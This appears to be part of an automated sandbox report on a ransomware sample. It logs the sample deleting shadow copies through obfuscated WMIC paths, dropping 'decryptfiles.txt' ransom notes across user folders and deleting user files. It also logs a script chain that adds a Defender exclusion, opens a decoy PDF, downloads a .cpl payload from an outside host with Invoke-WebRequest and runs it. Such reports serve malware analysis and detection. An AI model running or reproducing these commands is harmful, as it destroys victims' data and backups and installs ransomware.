Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\CKYlRS\CKYl\..\..\Windows\CKYl\CKYl\..\..\system32\CKYl\CKYl\..\..\wbem\CKYl\CKYlR\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\ZRfAzX\ZRfA\..\..\Windows\ZRfA\ZRfA\..\..\system32\ZRfA\ZRfA\..\..\wbem\ZRfA\ZRfAz\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\DHaecA\DHae\..\..\Windows\DHae\DHae\..\..\system32\DHae\DHae\..\..\wbem\DHae\DHaec\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\ndvCaU\ndvC\..\..\Windows\ndvC\ndvC\..\..\system32\ndvC\ndvC\..\..\wbem\ndvC\ndvCa\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\HMUcTz\HMUc\..\..\Windows\HMUc\HMUc\..\..\system32\HMUc\HMUc\..\..\wbem\HMUc\HMUcT\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\RpnEVb\RpnE\..\..\Windows\RpnE\RpnE\..\..\system32\RpnE\RpnE\..\..\wbem\RpnE\RpnEV\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\local\temp\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\desktop\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\desktop\aixacvybsb\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\desktop\dtbzgiooso\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\desktop\kzwfnrxyki\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\desktop\nebfqqywps\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\desktop\onbqclyspu\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\desktop\rayhiwgkdi\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\desktop\tqdgenuhwp\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\desktop\uoojjozirh\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\desktop\vlzdgukutz\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\desktop\wkxewiotxi\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\desktop\wutjscbcfx\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\desktop\zsszyefymu\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\documents\aixacvybsb\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\documents\dtbzgiooso\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\documents\kzwfnrxyki\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\documents\my music\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\documents\my pictures\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\documents\my videos\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\documents\nebfqqywps\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\documents\nhpkizuusg\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\documents\onbqclyspu\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\documents\rayhiwgkdi\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\documents\tqdgenuhwp\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\documents\uoojjozirh\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\documents\vlzdgukutz\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\documents\wkxewiotxi\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\documents\wutjscbcfx\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\pictures\camera roll\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\pictures\saved pictures\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\public\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\public\accountpictures\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\public\documents\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\public\documents\my music\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\public\documents\my pictures\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\public\documents\my videos\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\public\downloads\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\public\libraries\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\.ms-ad\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\3d objects\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\acrobat\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\acrobat\dc\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\acrobat\dc\collab\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\acrobat\dc\forms\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\acrobat\dc\jscache\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\acrobat\dc\security\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\acrobat\dc\security\crlcache\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\acrobat\preflight acrobat continuous\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\crlogs\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\crlogs\crashlogs\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\flash player\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\flash player\nativecache\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\headlights\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\linguistics\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\logtransport2\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\logtransport2cc\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\rttransfer\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\sonar\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\sonar\sonarcc\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\com.adobe.dunamis\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\com.adobe.dunamis\56079431-ea46-4833-94f9-1ff5658cdb1c\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\com.adobe.dunamis\61f56613-c62c-4b17-84dd-62b60d5776aa\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\com.adobe.dunamis\6d9d9777-7ded-4768-8191-9a707d72b009\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\com.adobe.dunamis\f2eb6c79-671d-4de2-b7be-3b2eea7abc47\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\addins\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\credentials\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\crypto\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\crypto\keys\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\crypto\rsa\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-2246122658-3693405117-2476756634-1003\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\excel\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\excel\xlstart\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\internet explorer\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\internet explorer\quick launch\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\implicitappshortcuts\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\taskbar\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\internet explorer\userdata\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\internet explorer\userdata\low\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\network\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\network\connections\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\network\connections\pbk\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\network\connections\pbk\_hiddenpbk\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\protect\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\protect\s-1-5-21-2246122658-3693405117-2476756634-1003\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\speech\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\spelling\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\systemcertificates\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\systemcertificates\my\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\systemcertificates\my\certificates\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\systemcertificates\my\crls\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\systemcertificates\my\ctls\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\vault\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\accountpictures\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\cloudstore\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\libraries\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\network shortcuts\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\printer shortcuts\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\recent\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\recent\automaticdesusertions\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\recent\customdesusertions\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\recent items\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\sendto\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\start menu\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\accessibility\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\accessories\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\administrative tools\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\chrome apps\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\maintenance\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\system tools\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\windows powershell\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\templates\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\themes\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\themes\cachedfiles\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\extensions\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\crash reports\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\crash reports\events\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\pending pings\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\bookmarkbackups\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\crashes\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\crashes\events\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\datareporting\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\datareporting\archived\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\datareporting\archived\2023-10\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\datareporting\glean\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\datareporting\glean\db\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\datareporting\glean\events\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\datareporting\glean\pending_pings\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\datareporting\glean\tmp\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\minidumps\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\saved-telemetry-pings\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\security_state\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\sessionstore-backups\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\storage\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\storage\default\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\storage\permanent\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\storage\permanent\chrome\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1657114595amcateirvtisty.files\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\storage\temporary\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\3nxxd8pi.default-release\storage\to-be-removed\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\ca4gppea.default\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\contacts\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\cookies\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\documents\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\downloads\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\favorites\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\favorites\links\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\links\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\onedrive\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\recent\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\saved games\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\searches\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile moved: C:\Users\user\Desktop\AIXACVYBSB.docx
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile deleted: C:\Users\user\Desktop\AIXACVYBSB.docx
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile moved: C:\Users\user\Desktop\DTBZGIOOSO\UMMBDNEQBN.xlsx
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile deleted: C:\Users\user\Desktop\DTBZGIOOSO\UMMBDNEQBN.xlsx
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile moved: C:\Users\user\Desktop\TQDGENUHWP\XZXHAVGRAG.mp3

System Summary

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\fjeljies.cplJump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\eryy65ty.exeJump to dropped file
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c control C:\Users\user\AppData\Local\Temp/fjeljies.cpl
